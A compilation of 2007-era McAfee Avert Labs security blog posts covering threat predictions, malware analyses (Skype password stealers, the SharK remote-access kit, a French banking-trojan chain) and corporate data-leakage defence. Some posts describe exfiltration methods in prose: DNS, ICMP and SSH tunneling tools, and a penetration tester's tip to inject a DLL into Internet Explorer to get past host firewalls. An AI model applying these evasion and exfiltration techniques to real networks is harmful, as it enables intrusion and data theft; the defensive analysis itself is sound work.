
It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

A common security theme in corporate America is to secure the outside Internet from the safe intranet. As a penetration tester, I’ll tell you that if you have over 1000 employees there is no “outside”.

Firewalls, NAT devices, and anti-exploitation techniques have made traditional remote exploitation extremely difficult. Pure remote exploitation over a technology such as RPC, IIS, etc still occurs but it’s much less common. Instead, attackers have transitioned to user driven attacks such as phishing, malicious emails, malicious websites, or malicious documents. The basic idea is to get your users to exploit their box for the attacker. Once the user does something unwise, the workstation inside your network is owned. If you have 1000+ workstations, there is virtually no chance that one of your employees won’t eventually enable this type of attack. When you factor in USB sticks, Wifi, VPN access, and laptops that travel, no reasonably large network can assume the internal network doesn’t touch the Internet.

Now that we’ve established the Internet can get into your internal hosts, can it get out?

Brad Antoniewicz’s recent blog describes several data exfiltration techniques. I’ve had success with DNS tunneling. Almost every firewall allows outbound DNS queries and the technology is well proven. Once your local workstation has been exploited, DNS tunneling will let the data out. However, my favorite technique is simple HTTP. First, outbound HTTP access is almost as universal as outbound DNS. To me, there are several benefits of HTTP traffic over DNS Tunnels:

1. DNS tunneling is innately anomalous – the messages are larger and more frequent than normal. Similarly, you’re likely ignoring TTL values. All of these can be red flags

2. Programming an HTTP tunnel is simple. You setup a fake page, setup a trigger value for data, post/get data as needed. You simply need to use the straightforward MS InternetOpen() and similar functions.

3. Many hosts now have firewalls that prompt to allow outbound access by application. In general, it’s best to use DLL injection to hook your callback into IE to get its access and to use any proxy authentication that may be needed. This technique almost always lets me out to the Internet from a workstation.

In various penetration tests, I’ve successfully used remote access tools that utilize HTTP traffic by hooking IE. It’s been VERY effective. Do you have technology to prevent this type of remote command and control?

In closing, as you design your network security policies and deploy technologies dependent on being safe from within, I encourage you to think of both how threats get into your network and how they can get out. If an attacker can do those two things, depending on your perimeter, this is asking for a security incident.

Corny titles aside, you might be surprised all of the ways that your “secure” internal corporate data can become unsecured public information by one disgruntled employee. Data leakage is when your internal corporate data is released to the public or anywhere else that is not in your control. This can be performed mainly in two ways, where the number of variants of each method can be virtually limitless.

• Physical removal of the data via hardcopy or softcopy on removable media
• Transfer of the data over the internet via email, FTP, SCP, etc..

Did I say limitless variants?! Yikes! So how do we prevent this? Well it’s rather unlikely that all of your employees will go under a strip search to validate that they do not have any paper shoved down there pants, but if we don’t allow access to those documents in the first place, and if we make sure they are properly disposed of (i.e shredded) when they are printed, it might be possible to limit some of our exposure

These physical threats are tricky issues that may never be fully solved, but they are extremely important to mindful of. In this post, we’ll focus on the non-physical side of data leakage. Right off the bat, lets disable the easy stuff:

• Discontinue the use of writeable CD/DVD drives on your client systems. There’s normally no reason for the average user to burn CD/DVDs. It might be a good idea that a manager or someone with a higher privilege to first filter this data before burning the data to disk. That is of course, you trust your managers.
• Disable USB/Firewire storage and removable media. You can disable USB all together if your company is not USB keyboard/mouse dependent.

These two basic things will force our mischievous friends to look at the internet as a means of transfer. On nearly every firewall/architecture review, I have one finding that states “Inadequate Egress Filtering”. Egress filtering is controlling the traffic leaving your organization, or traversing from a trusted to untrusted zone (i.e internal network to internet).

Although most companies I work with may or may not have a proxy server to scrutinize outbound traffic, they also have a ton of additional services permitted through the firewall, thus the “Inadequate Egress Filtering” finding. An additional problem that compounds this issue is the separation between the security staff and the firewall staff. This problem makes it hard for the security staff to accurately assess the firewall policy, and thus forces them to test these things on their own. To address this issue security staff can simply set up a host which has all ports open and place it on the internet. Use nmap to portscan the host:

nmap –sT –p 0-65535 [host]

What this will do is check which ports are allowed out through the firewall. There are some online services that will let you do this as well and even some messaging programs will have all ports open on their login servers. With the information presented by nmap, we can then get an idea of the existing potential areas for data leakage.

It’s extremely important to understand that any service can run on any port, which means that even the smallest allowance can permit someone to transmit data out to the internet. Let’s look at some common methods:

SSH Tunneling: Attackers can easily tunnel anything they’d like over SSH and as we mentioned, just because the default port for SSH is TCP/22, doesn’t mean it can’t run it on any other one. SSH can also be proxied, so application filters are even more important. Bottom Line: If an attacker can get SSH outbound, they can do anything!

DNS Tunneling: OzymanDNS (http://www.doxpara.com/ozymandns_src_0.1.tgz) can tunnel SSH over DNS! Yes, over DNS. So think twice about that permit udp any any eq 53, internal users should hit an internal DNS server which is responsible for its outbound queries.

ICMP Tunneling: If all else fails, attackers my try PingTunnel (http://www.cs.uit.no/~daniels/PingTunnel/), which as the name implies, allows SSH over ICMP! This kind of thing may make you think twice about allowing ICMP outbound to any host. If your network engineering staff really needs that as a tool, consider allowing ICMP only to particular hosts.

In an ideal situation, you’d have no outbound allowances without first being forced through a proxy server with application layer filtering. Even then, you only allow HTTP/HTTPS. You can then use a variety of software that will look for certain strings in HTTP/HTTPS or instant messaging sessions then ultimately notify you or prevent them from sending the data that matches. This is an excellent solution and should be deployed everywhere, for more information, Google “Data Leakage” and those applications will present themselves to you.

This isn’t meant to be fully comprehensive, but to just show the risks associated with the smallest allowance. If you can limit traffic outbound and scrutinize it where ever possible, you should be ok. Well… that’s if you try not to think about employee EVDO cards or test DSL lines that terminate at employee cubicles. =]

With Skype gaining popularity in the VoIP-IM space, it has become an attractive target for malware authors. Very recently we had blogged about the W32/Pykse.worm which used Skype for spreading.

Today we came across a new trojan - PWS-Pykse which attempts to steal Skype usernames and passwords. This trojan purports itself as a “Skype-Defender” plug-in for Skype. It displays a fake login window to trick the user into entering the login credentials:

The PWS-Pykse trojan does not spread by itself. It relies on social engineering techniques to trick the victim into executing it and is usually posted onto dodgy sites or forums. Upon execution, this trojan kills any running instance of Skype and displays a fake login window of Skype. It then captures the username and password entered by the victim, and posts it via http to the trojan author’s website.

An alert Skype user would notice that it looks very different from the normal Skype login window – especially since none of the hyperlinks or options displayed are functional! McAfee users are protected against this threat with the 5143 dat onwards.

This article literally made me laugh out loud, so I had to write about it.

I hope you’ve heard of the Darwin Awards. This would be my nomination for the Avert Labs Darwin Award (if we had such an award).

Evidently, a company called WorkSpace had a batch of their Apple computers stolen from their office. One of these computers had an application installed called Flickrbooth, which has the ability to automatically take snapshots with a webcam and upload them to a designated Flickr account.

Well, a few days ago, they discovered pictures of the new “owner” of their computers on their Flickr account. I present to you the face of today’s modern cybercriminal:

I guess this is a low-cost way of Lo-jacking your computer.

Germany’s Federal Criminal Police Office (the BKA) announced today that they busted an internation group of phishers, arresting 10 persons and seizing a number of computers together with other evidence. From the press release it’s evident this is a group that has been harassing the world with phishing emails containing Downloader-AAP as an attachment.

Downloader-AAP is ranked first in the list of ‘Top Corporate User Malware’ in our Avert Labs Threat Library. For many months there have been several waves a week of phishing emails sent with new variants of this downloader, that when executed would install some keylogging trojan. The emails typically look like a receipt sent from some company with details supposedly be found in the attached .zip. Some of these emails even claimed to have come from german law enforcement agencies, stating you’ve been caught sharing music, content from your hard disk has been confiscated using the ‘Bundestrojaner’ and the protocol is attached. Like in the example below:

I sincerely hope this is the last we’ve seen from this group.

Following recent allegations from the USA, Germany and lately from Australia and New Zealand that government and military networks have been attacked out of China and an earlier warning from the German Federal Office for the Protection of the Constitution (Verfassungsschutz) in february that an increased activity in hacking attempts out of China has been detected, it is now China who steps forward and claims they “have suffered ‘massive’ losses of state secrets through the Internet”.

According to a Reuters news the Vice Minister of Information Industry Lou Qinjian said that China’s computer networks were riddled with security holes and that the United States and other hostile powers where exploiting those for “political infiltration”.

While I’m definitely not in any position to judge on who did what to whom, this is starting to look like a contest for the title of ‘Least Secure Government IT Systems’.

For mobile phone fanatics, Woron Scan is a tool used to extract certain cellular information from the SIM card. We recently discovered a new Trojan (Spy-Wokiscan) that repackages the Woron Scan utility but also installs additional Trojans that are used to steal the victim’s cellular account information along with more data from the local computer. This Trojan is quite interesting as it takes a utility and repackages it to include Trojans. Once the Trojan installs itself, it starts the Woron scan utility. Then it takes the Woron Scan results and sends it to a remote Russian site.

Putting aside the fact that it is just about illegal in every country to use a cloned SIM, there are also dangers with using the software for creating these cloned SIM cards. This means that phone modders need to be aware of the source of the program they are using. Running this Trojan-repackaged Woron Scan will cause the SIM card’s private information to be sent to a remote hacker. Then once a cloned SIM is created, that person can use the cloned mobile phone to make calls as they please–while leaving their victims to prove those calls didn’t belong to them. In these days of cybercrime and terrorism, modders should really consider the risks involved in modding their phones.

Just a note for those who decide to use a cloned SIM card: Most cellular providers have the ability to track and log certain anomalies caused by the cloned SIM. That means the chances are pretty good that the cloned SIM will be blocked or the user of the cloned SIM will be getting a call from the local authorities.

For further information regarding the Spy-Wokiscan, please visit our VIL description located at http://vil.nai.com/vil/content/v_142989.htm.

Malware authors have always been coming up with new and improved ways to control compromised machines. Remote-access Trojans have been in use for a long time. One of the most infamous is Back Orifice.

With the prevalence of DIY kits, every kid on the block has the ability to invade other people’s computers at whim. But what has changed over the course of time is the ease of use of these kits along with the advancement in stealth technologies. SharK is one such remote-access Trojan kit that allows the attacker to customize the Trojan with loads of features available within the toolkit.

Fig 1: SharK2 Server configuration options.

In a nutshell, the server created using the kit can be typically configured to do the following:

• Load the Trojan at every startup using ActiveX keys specified in the registry.
• Social-engineer the victim to believe he has opened a genuine executable, like notepad.
• Ability to bind with other genuine files.
• Capable of acting like a retrovirus disabling antivirus softwares. The kit also gives users the option to blacklist and cripple various security and analysis tools on the victim machine.
• Also have stealth options like melting the server on execution, modifying file attributes, modifying file creation time of the server, or opening the ports only when there is an Internet connection.
• Encrypts the header and uses its own stub.

One of the unique characteristics of this kit is its ability to identify sandboxes. Even though anti-sandboxing techniques were discussed widely, this kit would probably be one of the few to implement this feature. Clubbed with this are anti-debugging and VMware detection techniques that could make the process of analyzing this Trojan a little difficult.

Fig 2: Web Downloader Component

Once infected, the victim would connect back to the specified address and port.

• Like many Trojans, SharK uses the RC4 cipher to encrypt the traffic.
• Keylogger works with WH_KEYBOARD_LL hooks.
• Interactive DOS-Shell
• Manipulate running processes, windows, and services from the remote console.
• Interactive Process blacklisting, which alerts the attacker if the blacklisted process is found on the victim machine and prompts the attacker to take action (see Fig 3).
• Code injection into a hidden Internet Explorer window in an attempt to bypass firewalls.
• Uses Web Downloader to download and execute files on the victim machine (see Fig 2).
• Attacker could redirect victims to various phishing Web sites.

Fig 3: Interactive process blacklist

The kit is also constantly updated to introduce new features. With the alleged leaked source code up for sale in various forums, more versions are likely to emerge. Having a look at our samples collection was enough to establish that malicious people have already started capitalizing on this toolkit.

We at McAfee Avert Labs are on the lookout for new threats as always and we detect the configurator as BackDoor-DKG.cfg and the server is detected as BackDoor-DKG with the current DATS.

McAfee Avert Labs had several presentations this year. One each at BlackHat and DefCon.

John Viega and David Coffey presented on Building an Effective Application Security Practice on a Shoestring Budget at BlackHat. I heard quite a bit of positive feedback on this at the conference itself. Kudos and extra points to both John and Dave to working in beer references!

Toralv Dirro and Dirk Kollberg presented Trojans: A Reality Check at DefCon. This one was also very well received (I actually got to attend this one!) and they were swamped (maybe not the best choice of word but many people came up to the podium anyway) with questions afterward. They gave a great update on trojans in general as well as a technical dive into recent developments on the German malware scene. Dirk even showed a fascinating command and control demo that illustrated the ease of malware creation and control.

Enjoy!

An exploit found to be targeting an unpatched (as of the time of this writing) vulnerability for the Japanese word processor, JustSystem Ichitaro was discovered in-the-wild on 3rd August. We identify the threat as Exploit-TaroDrop.c trojan.

The modus operandi bears close resemblance to the 0-day attack we blogged about in April 2007. The attack, delivered in the form of a maliciously crafted document drops BackDoor-DKI.gen, a trojan that was used amongst other malware in the April attacks. The shellcode drops a clean copy of the document as “aa.jtd” and re-opens it in the word processor. Other than that, additional obfuscation code is added on top of the basic XOR encryption we saw in the past.

We caution all Ichitaro users that we may continue to see such attacks against this localized applications. More details of Exploit-TaroDrop.c at http://vil.nai.com/vil/content/v_142899.htm .

Cybercrime has always tried to wriggle its way into the areas of our online experience that seem the most safe and familiar. Using social engineering to tug at our heartstrings or tap into our fears, this form of crime makes us feel sorry or scared enough to divulge our most valuable personal information. There have been a couple of articles in the news describing how the well-known Nigerian scam and generic identity theft have reached interesting new dimensions.

In this variation on the Nigerian scam, a beautiful woman from Russia contacts someone through MySpace, and romantic exchanges ensue. The woman says she will come visit, which eventually leads to her having trouble transferring money for the plane ticket, and then asking for (financial) assistance.

The new twist on identity theft deals with using the details of a prize-winning dog’s pedigree to sell unrelated puppies. The dog’s details were found on a Web site accidentally posted by an employee.

Neither example is particularly surprising, but it does indicate an underlying trend. Criminals are finding better angles in social engineering, and more uses for personal details outside of the usual government ID/credit card data. The tech savvyness of the general Internet public is not keeping up with that of Internet criminals. And now they’re moving squarely into the most soft and fuzzy of arenas–cute animals and romance.

I gotta wonder what’s next–attacking rainbows and sunshine?

As recently as five years ago, most of us probably communicated electronically only through either e-mail or phone. If someone wanted to pry into these communications, they had to tap our phones, steal our phone records or hack our e-mail accounts. But today, we voluntarily leave bits and pieces of our personal lives scattered all over the Internet. From elaborate profiles on social networking sites (such as Facebook, which, for example, has experienced a growth explosion in Australia as of late) to innocuous comments on personal blogs of others, we publish our likes and dislikes, our affiliations, political views and even our day to day routine for pretty much the whole world to see. In fact, younger Internet users appear to be leading the way. And it’s not all just play either. We increasingly rely on sites like Seek, monster.com and LinkedIn to advance our careers as well. These days, not only do we seem to leave a part of our digital personality wherever we spend a lot of time online, but we also seem to bundle a much greater part of our lives into this digital personality.

Now, is it too much of a stretch to imagine digital identity thieves and other fraudsters working hard, even as we speak, using the awesome power of modern search engines to put together these various online clues to piece the puzzle that is the digital you? I think not! I believe that this is already happening on a wider scale than any of us would like to believe. We’ve made it easier for anyone to discover who we are and increased their chances to get acquainted with us, no matter where in the world they are. Especially with social networking sites and online dating sites, shady characters could easily work their way into our trust gradually, starting off as a “friend of a friend of a friend” or a potential love interest. From the stories I’ve heard, this seems to be taking place a lot more than I would have considered to be the case.

To compound the issue, online services are becoming extremely complex. With a diverse set of functionalities and the ability to “host applications” or mash-ups, these online platforms are getting as complex as operating systems themselves. What does this all mean? Well, it means that online service are increasingly becoming exposed to various attacks like Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF) not to mention the oldest trick in the book - social engineering. Unfortunately, traditional anti-virus software, personal firewalls or host-based intrusion prevention products sometimes are not very well suited to address some of these threats at present.

Our online world is changing and it’s changing fast. With the explosion of exciting new possibilities also come a set of unfamiliar risks. So what do we do? Do we curb our enthusiasm and say no to progress? Not at all. Fear is hardly the solution. All we have to do is to be a bit more proactive about our online security. Make sure we educate ourselves on the latest threats. Think twice about what personal information we share online and with whom. If you happen to notice something “fishy” going on, please notify someone who could look into that. While the security industry is moving fast, innovating new technology to provide better protection, you are still the single most important contributor to online security; both yours and ours that is.

Be safe and have a great social computing experience!

At the midyear mark when the sun is at its farthest point north—at least in our hemisphere—it seems appropriate to revisit our predictions for the Top 10 security threats in 2007. Just how good was the McAfee Avert Labs team at reading the tea leaves six months ago?

I conferred with my colleagues in Avert Labs and rounded up the latest data to see if the facts support our prognostications. Let’s revisit our forecast and see how well we did. I decided to score each prediction on a scale of 1 to 5, with 5 being the highest possible score for excellence in crystal ball gazing. (These are in no particular order.)

1. Password-stealing web sites are on the rise.
Score: 5

We continue to see exponential growth in phishing sites. Based on the number of sites blocked by our phishing traps, activity in January alone increased by 358 percent vs. the entire fourth quarter of 2006. February and March rose by at least 200 percent each compared to the same period. In total, the first three months of this year saw a 784 percent increase—with no slowdown in sight.

We also anticipate an increase in the abuse of open-content sites, such as Google and Wiki pages. Google accounts can be used to host drop boxes (via Gmail) or phishing sites (Google Docs). Even Internet archive sites will suffer.

2. Spam, particularly image spam, is on the increase.
Score: 3

The total volume of trap-based spam has stayed fairly flat during the first part of the year. Image spam accounted for to 65 percent of all spam at the beginning of the year and has now declined a bit. Image spam, which has messages embedded in images rather than text (typically pump-and-dump stocks, pharmacy, and degree spam), is still a force to be reckoned with. It hovers between 30 percent to 50 percent of all spam that tries to find its way into users’ inboxes.

3. The popularity of video on the web makes it a target for hackers.
Score: 4

There’s no doubt that hackers are riding the wave of online video available on hugely popular social networking sites like YouTube and MySpace. Astute social engineering— coupled with video’s inherently easy-to-program format—has enabled cybercriminals to come up with a variety of clever tricks. Witness these recent MySpace exploits:

Earlier this year, hackers targeted fans of the French rock band MAMASAID. When fans visited a MySpace account promoting the music group, they’d get a Trojan called JS/SpaceStalk installed on their computers through an insecure feature in QuickTime, HREF Tracks, which allows links to be opened automatically when you run a movie. This link was misused to lure visitors to malicious web sites hosting spyware and other exploit code.

MySpace has also been the target of phishing scams. After gathering MySpace user credentials from phishing sites, spammers log in to accounts and then post spam messages on other accounts. It’s an issue because MySpace can’t close down legitimate user accounts.

4. Mobile phone attacks will become more prevalent.
Score: 0

Surprisingly, mobile malware numbers are down for the first quarter of 2007 (12 attacks), compared to the first quarter of 2006 (47).

5. Adware will go mainstream.
Score: 3

Because adware has gotten such a bad rap, businesses are experimenting with more creative ways to deliver ads on the Internet. BitTorrent is setting a trend by offering free ad-supported downloads rather than paid downloads for its online TV network, so customers see ads before and after watching an episode or a movie—much like traditional television. YuMe Networks is also likely to follow this model.

6. Identity theft and data loss will continue to be a public issue.
Score: 5

According to Attrition’s Data Loss Database—Open Source, more than 13.7 million records have been breached thus far. Compare that to 1.8 million during the same period last year! We maintain our belief that the unauthorized transmission of information will become more of a risk for enterprises. This includes loss of customer data, employee personal information and intellectual property from a variety of channels—applications, networks, and even physical channels, like USB devices, printers, fax and removable storage. If you want to get a more detailed picture of how grave the problem is, take a look at the recent Datamonitor report [“Datagate: The Next Inevitable Corporate Disaster?”] According to the report, more than 60 percent of respondents interviewed experienced data loss within the last year, and an astounding 33 percent believe it could put them out of business!

7. The use of bots will increase.
Score: 3

The statistics from our daily collections show that bots actually declined to a low point in November 2006, but are now increasing again. The numbers aren’t as high as they were 12 months ago, but they’re definitely heading up.

8. Parasitic malware will make a comeback.
Score: 5

There’s no doubt about this one. Philis and Fujacks continue to be active parasitic families, and Avert Labs has classified more than 150 new variants of these two families since 2007. And, let’s not forget other families like Sibil, Grum, and Expiro.

9. The number of rootkits on 32-bit platforms will increase.
Score: 4

According our Virus Tracking Map, approximately 200,000 systems reported rootkit infestations since the beginning of 2007—a 10 percent increase over the first quarter of 2006. (By the way, if you want to check your system, download our free Rootkit Detective. And, of course, VirusScan for Enterprise includes antirootkit technology.)

10. Vulnerabilities will continue to cause concern.
Score: 5

Not only do they continue to cause concern, there are more of them to worry about than ever before. In January and February 2006, Microsoft issued patches for five important and five critical vulnerabilities. During the same months this year, Microsoft patched nine important and 27 critical vulnerabilities.

So, when all is said and done, it looks like our oracles hit the mark in most areas. Stay tuned for a re-evaluation of these trends later this year.

In April 2007, the number of unique phishing websites detected by APWG was 55,643. In its report, the association shows a 166% rise from the previous month and 48% from the previous high for phishing URLs (in October 2006).

This trend indeed is going up. It does not follow the total number of unique phishing reports submitted to APWG. This other statistics is steady and, surprisingly known mirror sites are more numerous than known attacks!

In this report, Laura Mather, Ph.D., Senior Scientist at MarkMonitor explains this huge number. Similar to what they were doing in late 2006, the phishers start again using the tactic of putting a large numbers of mirror sites on the same domain. She relates to have seen cases where there were thousands.

Typically, URL multiplying techniques involve apparently automated creation of subdomains (xxxx.fakedomain.com) to establish discrete hosts for phishing sites or the use of different directories on the same domain (xxxx.fakedomain.com/xxxx).

Criminals do this in an attempt to get around website blocking that Internet Explorer 7.0 and Firefox 2 have deployed to protect consumers from fraudulent sites.

The last APWG Phishing Trends Activity Report (April 2007) is available here : http://www.antiphishing.org/reports/apwg_report_april_2007.pdf

(Updated on May 29. See note at end.)

Last Friday, we received various suspicious HTML files that contain malicious JavaScript routines. These contact a remote Web site and silently download an EXE file, which in turn downloads various unknown but suspicious programs. In France we decided to press the matter for several reasons: French or francophone people appeared specially targeted; not only banking and e-commerce data were stolen, but also more critical information linked to the private lives of our fellow citizens. So we contacted the French authorities.

We were able to fit together the pieces of the puzzle and understand the attack architecture.

The attacks started each time a victim reached an initiator site (1) hosting one of these scripts. One used an adodb.stream exploit; others exploited vulnerabilities referenced as MS06-006 and MS06-024.

While browsing that page, an EXE file, located in an intermediate site, was silently dropped on the victim’s computer (2). If this downloader was not detected by up-to-date antivirus software, it turned off Microsoft Security Center, modified some registry keys, and downloaded and installed another Trojan (3). When this work was done, the downloader self-destructed and passed control to the Trojan. Using the victim’s IP address as parameter, the Trojan ran a JavaScript query to localize the infected machine (4). It used this site:

http://fresh-news.info/geoip/ip.php

Later the returned data were saved in the local registry as :
HKLM\System\CurrentControlSet\Control\InitRegKey\geoinfo

• iso
• country
• region
• city
• latitude
• longitude
• ip

This information was sent to the collector site found at the top of some TXT files (more on those later). Here’s a fake example:

PC Name = JOHN-3GR6524FRHN
PC IP = 82.22.97.32
PC Country/ISO/Region/City = france/fr/a3/paris
PC Location longitude/latitude = 2.3333/48.8667
Log Creation = 2007/05/21 13:22:05

Before this Trojan disappeared, it downloaded two new files (5). The first deactivated various antivirus software and modified the system’s host file to prevent security updates from happening. But its main purpose was to take screenshots each time the victim clicked on a mouse button while inside a remote authentication window. Depending on which mouse button the user clicked, the following image file was created:

date_time_snapshot-number_LMB_input-form-URL.jpg
date_time_snapshot-number_RMB_input-form-URL.jpg

The images files were sent to a collector site (6). That site’s address, login, and password, as well as links to download other malware were accessible via an admin site driven by the hackers (7).

The second file was a Browser Helper Object/password stealer. It especially monitored transactions with these financial sites:

• e-gold.com,
• meine.deutsche-bank.de,
• banking.postbank.de

However, the BHO watched many other authentication forms and sent data to the collector site (6) using TXT files:

ISO-country-code_computername_IP_Date_time.txt

Other malware were downloaded according to instructions found on the collector site (8). These created a local web server (9) and implemented a PHP backdoor on the compromised machine. A proxy (9) was also created with various services:

• SSL proxy
• HTTP proxy
• Socks server
• Telnet gateway
• SMTP server
• FTP server
• Remote administration server
• Port mapping

After all this preparation these machines were able to act as zombies.

But that’s not all: A keylogger (10) was also downloaded. It collected the victim’s keystrokes and created this file:

keylog_ISO-country-code_computername_IP_date_time.txt

This Trojan also extracted all the URLs and the associated usernames/passwords saved by Internet Explorer via the AutoComplete facility, and created this file:

pstore_date_time.txt

The Trojan regularly sent all the TXT files to the collector site (6), where they were automatically saved by country and by computer. Here’s a view taken before the site was closed:

Today we have all the pieces of this puzzle.

As I said in introducing this blog, I found the geographical distribution unusual. France had the second highest number of victims, and the collected data were also very sensitive.

The stick-pin maps show the distribution.

We often hear of IT threats targeting the Anglo-American countries. This matter shows that no country is safe from cybercriminals.
——
Updated May 29:
I made two typos when I discussed the analysis of Elodie Grandjean. The first concerns one vulnerability used in this attack (it is MS06-024 and not MS06-026). The other regards the password stealer functionality. Both have been corrected in the text.

I have read a couple of articles today; and I’m not sure whether to laugh or freak out. The claim is that major companies would be able to identify your name, address, gender, and make suggestions for possible life decisions. Is this for real? On the one hand I’m inclined to laugh because these are such ludicrous claims. It must surely be a hoax, and who in their right minds would trust strangers with that much information? On the other hand, I’m freaked out because once advertising money gets behind such a thing, it could very well become a reality. I also know there are agencies that already have much of this info about me, but it’s not as if they’re metaphorically or literally rifling through my trash to get it–I have to specifically give it to them and they have to spell out precisely what they’ll be doing with it.

Some of my colleagues say that I’m pretty paranoid about this sort of thing. And honestly, much of my argument boils down to “it gives me the wiggins, dood!” I haven’t gone so far as to store my life savings under my mattress, but there are certain Web 2.0 sites I just won’t participate in because there’s too much exposure, and I’m tired of getting spam and creepy messages from total strangers. In short, my time, sanity, and identity are worth more to me than the risks these sites represent.

I understand people enjoy the interconnectedness and power that these sites offer, and if you don’t mind the potential danger, spam, and creepiness, then more power to you. I won’t make prognostications of corporations using this for evil or what have you, because these areas are always a bit gray in reality. I will, however, remind people that accidents and cybercrimes do happen–no security is 100 percent bulletproof. This could be an incredibly valuable database that could be accessible to many more people than those databases where I give my information freely. The value of that data alone significantly ups the odds of criminals getting involved.

And really, the Internet offers more than enough opportunities for people to overexpose themselves without major companies taking it to another level.